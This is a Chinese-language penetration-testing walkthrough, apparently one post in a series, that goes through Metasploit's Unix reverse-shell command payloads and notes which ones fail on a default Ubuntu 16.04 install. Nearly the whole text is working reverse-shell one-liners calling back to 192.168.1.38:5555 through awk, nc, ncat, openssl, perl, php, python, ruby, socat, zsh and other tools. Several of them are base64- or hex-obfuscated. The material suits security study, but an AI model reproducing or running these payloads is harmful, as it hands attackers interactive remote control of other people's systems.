msf 中有很多 payload ,我们来看一下可以用来unix 中反弹shell的paylaod
切换到 msf 目录
./msfvenom -l payloads | grep 'cmd/unix/reverse'
挨个瞅瞅
awk 'BEGIN{s="/inet/tcp/0/192.168.1.38/5555";while(1){do{s|&getline c;if(c){while((c|&getline)>0)print $0|&s;close(c)}}while(c!="exit");close(s)}}'
在Ubuntu 16.04 上 awk 命令执行默认命令会失败,我看网络上大家都是用 centos 来进行反弹的;gawk 命令在 Ubuntu 16.04 中并不是默认命令,需要安装,违背我之前的想法
这个就没啥好测试的了,前面文章我们测试的要比这个多得多
mkfifo hoDXPErDo && telnet -z verify=0 192.168.1.38 5555 0<hoDXPErDo | $(which $0) 1>hoDXPErDo & sleep 10 && rm hoDXPErDo &
可以看到 Ubuntu 16.04 自带的 telnet 中没有 -z
选项,执行失败,不知道是否centos上面可以执行
不说了,不说了,记得用 sh
echo "eval(new java.lang.String(java.util.Base64.decoder.decode('dmFyIFByb2Nlc3NCdWlsZGVyPUphdmEudHlwZSgiamF2YS5sYW5nLlByb2Nlc3NCdWlsZGVyIik7dmFyIHA9bmV3IFByb2Nlc3NCdWlsZGVyKCIvYmluL3NoIikucmVkaXJlY3RFcnJvclN0cmVhbSh0cnVlKS5zdGFydCgpO3ZhciBzcz1KYXZhLnR5cGUoImphdmEubmV0LlNvY2tldCIpO3ZhciBzPW5ldyBzcygiMTkyLjE2OC4xLjM4Iiw1NTU1KTt2YXIgcGk9cC5nZXRJbnB1dFN0cmVhbSgpLHBlPXAuZ2V0RXJyb3JTdHJlYW0oKSxzaT1zLmdldElucHV0U3RyZWFtKCk7dmFyIHBvPXAuZ2V0T3V0cHV0U3RyZWFtKCksc289cy5nZXRPdXRwdXRTdHJlYW0oKTt3aGlsZSghcy5pc0Nsb3NlZCgpKXt3aGlsZShwaS5hdmFpbGFibGUoKT4wKXNvLndyaXRlKHBpLnJlYWQoKSk7d2hpbGUocGUuYXZhaWxhYmxlKCk+MClzby53cml0ZShwZS5yZWFkKCkpO3doaWxlKHNpLmF2YWlsYWJsZSgpPjApcG8ud3JpdGUoc2kucmVhZCgpKTtzby5mbHVzaCgpO3BvLmZsdXNoKCk7SmF2YS50eXBlKCJqYXZhLmxhbmcuVGhyZWFkIikuc2xlZXAoNTApO3RyeXtwLmV4aXRWYWx1ZSgpO2JyZWFrO31jYXRjaChlKXt9fTtwLmRlc3Ryb3koKTtzLmNsb3NlKCk7')));"|jjs
可以看到,想要使用 jjs 来进行反弹shell,那就需要安装java 环境, Ubuntu 16.04 中没有安装java环境
ksh -c 'ksh >/dev/tcp/192.168.1.38/5555 2>&1 <&1'
ksh 在 Ubuntu 16.04 中没有自带 KSH
lua -e "local s=require('socket');local t=assert(s.tcp());t:connect('192.168.1.38',5555);while true do local r,x=t:receive();local f=assert(io.popen(r,'r'));local b=assert(f:read('*a'));t:send(b);end;f:close();t:close();"
不用想,Ubuntu 16.04 中不可能自带Lua,别问我为什么这么肯定
ncat -e /bin/sh --ssl 192.168.1.38 5555
ncat 是 Nmap的一个组件,默认 Ubuntu 16.04 中是没有的
mkfifo /tmp/gbiwa; nc 192.168.1.38 5555 0</tmp/gbiwa | /bin/sh >/tmp/gbiwa 2>&1; rm /tmp/gbiwa
参照之前nc 反弹shell的文章
node -e 'eval("\x20\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x7b\x20\x76\x61\x72\x20\x72\x65\x71\x75\x69\x72\x65\x20\x3d\x20\x67\x6c\x6f\x62\x61\x6c\x2e\x72\x65\x71\x75\x69\x72\x65\x20\x7c\x7c\x20\x67\x6c\x6f\x62\x61\x6c\x2e\x70\x72\x6f\x63\x65\x73\x73\x2e\x6d\x61\x69\x6e\x4d\x6f\x64\x75\x6c\x65\x2e\x63\x6f\x6e\x73\x74\x72\x75\x63\x74\x6f\x72\x2e\x5f\x6c\x6f\x61\x64\x3b\x20\x69\x66\x20\x28\x21\x72\x65\x71\x75\x69\x72\x65\x29\x20\x72\x65\x74\x75\x72\x6e\x3b\x20\x76\x61\x72\x20\x63\x6d\x64\x20\x3d\x20\x28\x67\x6c\x6f\x62\x61\x6c\x2e\x70\x72\x6f\x63\x65\x73\x73\x2e\x70\x6c\x61\x74\x66\x6f\x72\x6d\x2e\x6d\x61\x74\x63\x68\x28\x2f\x5e\x77\x69\x6e\x2f\x69\x29\x29\x20\x3f\x20\x22\x63\x6d\x64\x22\x20\x3a\x20\x22\x2f\x62\x69\x6e\x2f\x73\x68\x22\x3b\x20\x76\x61\x72\x20\x6e\x65\x74\x20\x3d\x20\x72\x65\x71\x75\x69\x72\x65\x28\x22\x6e\x65\x74\x22\x29\x2c\x20\x63\x70\x20\x3d\x20\x72\x65\x71\x75\x69\x72\x65\x28\x22\x63\x68\x69\x6c\x64\x5f\x70\x72\x6f\x63\x65\x73\x73\x22\x29\x2c\x20\x75\x74\x69\x6c\x20\x3d\x20\x72\x65\x71\x75\x69\x72\x65\x28\x22\x75\x74\x69\x6c\x22\x29\x2c\x20\x73\x68\x20\x3d\x20\x63\x70\x2e\x73\x70\x61\x77\x6e\x28\x63\x6d\x64\x2c\x20\x5b\x5d\x29\x3b\x20\x76\x61\x72\x20\x63\x6c\x69\x65\x6e\x74\x20\x3d\x20\x74\x68\x69\x73\x3b\x20\x76\x61\x72\x20\x63\x6f\x75\x6e\x74\x65\x72\x3d\x30\x3b\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x20\x53\x74\x61\x67\x65\x72\x52\x65\x70\x65\x61\x74\x28\x29\x7b\x20\x63\x6c\x69\x65\x6e\x74\x2e\x73\x6f\x63\x6b\x65\x74\x20\x3d\x20\x6e\x65\x74\x2e\x63\x6f\x6e\x6e\x65\x63\x74\x28\x35\x35\x35\x35\x2c\x20\x22\x31\x39\x32\x2e\x31\x36\x38\x2e\x31\x2e\x33\x38\x22\x2c\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x20\x7b\x20\x63\x6c\x69\x65\x6e\x74\x2e\x73\x6f\x63\x6b\x65\x74\x2e\x70\x69\x70\x65\x28\x73\x68\x2e\x73\x74\x64\x69\x6e\x29\x3b\x20\x69\x66\x20\x28\x74\x79\x70\x65\x6f\x66\x20\x75\x74\x69\x6c\x2e\x70\x75\x6d\x70\x20\x3d\x3d\x3d\x20\x22\x75\x6e\x64\x65\x66\x69\x6e\x65\x64\x22\x29\x20\x7b\x20\x73\x68\x2e\x73\x74\x64\x6f\x75\x74\x2e\x70\x69\x70\x65\x28\x63\x6c\x69\x65\x6e\x74\x2e\x73\x6f\x63\x6b\x65\x74\x29\x3b\x20\x73\x68\x2e\x73\x74\x64\x65\x72\x72\x2e\x70\x69\x70\x65\x28\x63\x6c\x69\x65\x6e\x74\x2e\x73\x6f\x63\x6b\x65\x74\x29\x3b\x20\x7d\x20\x65\x6c\x73\x65\x20\x7b\x20\x75\x74\x69\x6c\x2e\x70\x75\x6d\x70\x28\x73\x68\x2e\x73\x74\x64\x6f\x75\x74\x2c\x20\x63\x6c\x69\x65\x6e\x74\x2e\x73\x6f\x63\x6b\x65\x74\x29\x3b\x20\x75\x74\x69\x6c\x2e\x70\x75\x6d\x70\x28\x73\x68\x2e\x73\x74\x64\x65\x72\x72\x2c\x20\x63\x6c\x69\x65\x6e\x74\x2e\x73\x6f\x63\x6b\x65\x74\x29\x3b\x20\x7d\x20\x7d\x29\x3b\x20\x73\x6f\x63\x6b\x65\x74\x2e\x6f\x6e\x28\x22\x65\x72\x72\x6f\x72\x22\x2c\x20\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x65\x72\x72\x6f\x72\x29\x20\x7b\x20\x63\x6f\x75\x6e\x74\x65\x72\x2b\x2b\x3b\x20\x69\x66\x28\x63\x6f\x75\x6e\x74\x65\x72\x3c\x3d\x20\x31\x30\x29\x7b\x20\x73\x65\x74\x54\x69\x6d\x65\x6f\x75\x74\x28\x66\x75\x6e\x63\x74\x69\x6f\x6e\x28\x29\x20\x7b\x20\x53\x74\x61\x67\x65\x72\x52\x65\x70\x65\x61\x74\x28\x29\x3b\x7d\x2c\x20\x35\x2a\x31\x30\x30\x30\x29\x3b\x20\x7d\x20\x65\x6c\x73\x65\x20\x70\x72\x6f\x63\x65\x73\x73\x2e\x65\x78\x69\x74\x28\x29\x3b\x20\x7d\x29\x3b\x20\x7d\x20\x53\x74\x61\x67\x65\x72\x52\x65\x70\x65\x61\x74\x28\x29\x3b\x20\x7d\x29\x28\x29\x3b");'
看着架势似乎是利用 nodejs 执行了一段shellcode
Ubuntu 16.04 没有自带 nodejs
sh -c '(sleep 3797|openssl s_client -quiet -connect 192.168.1.38:5555|while : ; do sh && break; done 2>&1|openssl s_client -quiet -connect 192.168.1.38:5555 >/dev/null 2>&1 &)'
这个payload 与我们之前的用的openssl不太一样,不过大同小异
很好,又找到一个openssl的变形shell
perl -MIO -e '$p=fork;exit,if($p);foreach my $key(keys %ENV){if($ENV{$key}=~/(.*)/){$ENV{$key}=$1;}}$c=new IO::Socket::INET(PeerAddr,"192.168.1.38:5555");STDIN->fdopen($c,r);$~->fdopen($c,w);while(<>){if($_=~ /(.*)/){system $1;}};'
可以看到执行失败了,原因是 IO 这个库有问题,如果想用perl反弹shell可以参照之前的文章
perl -e 'use IO::Socket::SSL;$p=fork;exit,if($p);$c=IO::Socket::SSL->new(PeerAddr=>"192.168.1.38:5555",SSL_verify_mode=>0);while(sysread($c,$i,8192)){syswrite($c,`$i`);}'
php -r '$ctxt=stream_context_create(["ssl"=>["verify_peer"=>false,"verify_peer_name"=>false]]);while($s=@stream_socket_client("ssl://192.168.1.38:5555",$erno,$erstr,30,STREAM_CLIENT_CONNECT,$ctxt)){while($l=fgets($s)){exec($l,$o);$o=implode("\n",$o);$o.="\n";fputs($s,$o);}}'&
问题同样
python -c "exec('aW1wb3J0IHNvY2tldCAgICAsICAgICAgIHN1YnByb2Nlc3MgICAgLCAgICAgICBvcyAgICAgICAgOyAgIGhvc3Q9IjE5Mi4xNjguMS4zOCIgICAgICAgIDsgICBwb3J0PTU1NTUgICAgICAgIDsgICBzPXNvY2tldC5zb2NrZXQoc29ja2V0LkFGX0lORVQgICAgLCAgICAgICBzb2NrZXQuU09DS19TVFJFQU0pICAgICAgICA7ICAgcy5jb25uZWN0KChob3N0ICAgICwgICAgICAgcG9ydCkpICAgICAgICA7ICAgb3MuZHVwMihzLmZpbGVubygpICAgICwgICAgICAgMCkgICAgICAgIDsgICBvcy5kdXAyKHMuZmlsZW5vKCkgICAgLCAgICAgICAxKSAgICAgICAgOyAgIG9zLmR1cDIocy5maWxlbm8oKSAgICAsICAgICAgIDIpICAgICAgICA7ICAgcD1zdWJwcm9jZXNzLmNhbGwoIi9iaW4vYmFzaCIp'.decode('base64'))"
Ubuntu 16.04 默认python3,而payload 是针对 python2 版本的,具体可以参照之前的python3章节
python -c "exec('aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zLHNzbApzbz1zb2NrZXQuc29ja2V0KHNvY2tldC5BRl9JTkVULHNvY2tldC5TT0NLX1NUUkVBTSkKc28uY29ubmVjdCgoJzE5Mi4xNjguMS4zOCcsNTU1NSkpCnM9c3NsLndyYXBfc29ja2V0KHNvKQpoWT1GYWxzZQp3aGlsZSBub3QgaFk6CglkYXRhPXMucmVjdigxMDI0KQoJaWYgbGVuKGRhdGEpPT0wOgoJCWhZID0gVHJ1ZQoJcHJvYz1zdWJwcm9jZXNzLlBvcGVuKGRhdGEsc2hlbGw9VHJ1ZSxzdGRvdXQ9c3VicHJvY2Vzcy5QSVBFLHN0ZGVycj1zdWJwcm9jZXNzLlBJUEUsc3RkaW49c3VicHJvY2Vzcy5QSVBFKQoJc3Rkb3V0X3ZhbHVlPXByb2Muc3Rkb3V0LnJlYWQoKSArIHByb2Muc3RkZXJyLnJlYWQoKQoJcy5zZW5kKHN0ZG91dF92YWx1ZSkK'.decode('base64'))" >/dev/null 2>&1 &
问题同样
R -e "s<-socketConnection(host='192.168.1.38',port=5555,blocking=TRUE,server=FALSE,open='r+');while(TRUE){writeLines(readLines(pipe(readLines(s, 1))),s)}"
r 语言默认也是没有安装的
ruby -rsocket -e 'exit if fork;c=TCPSocket.new("192.168.1.38","5555");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end'
ruby Ubuntu 16.04 也是没有安装的
ruby -rsocket -ropenssl -e 'exit if fork;c=OpenSSL::SSL::SSLSocket.new(TCPSocket.new("192.168.1.38","5555")).connect;while(cmd=c.gets);IO.popen(cmd.to_s,"r"){|io|c.print io.read}end'
原因同上
socat udp-connect:192.168.1.38:5555 exec:'bash -li',pty,stderr,sane 2>&1>/dev/null &
Ubuntu 16.04 默认没有安装socat
sh -c '(sleep 4119|telnet -z 192.168.1.38 5555|while : ; do sh && break; done 2>&1|telnet -z 192.168.1.38 5555 >/dev/null 2>&1 &)'
telnet 没有 -z 选项,下一个
Creates an interactive shell through an inbound connection (stub only, no payload)
上面是这个payload的描述,这个payload不生成反弹命令,我搜索了国内国外文章也没找到解释
经过测试,似乎这个就是一个nc的监听功能,就是说在 exploit/multi/handler 中可以设置,可以用来接受 bash,python3等反弹回来的shell,监听openssl和meterpreter 会失败
zsh -c 'zmodload zsh/net/tcp && ztcp 192.168.1.38 5555 && zsh >&$REPLY 2>&$REPLY 0>&$REPLY'
默认也没有安装zsh,不过zsh 很多发行版都是默认安装的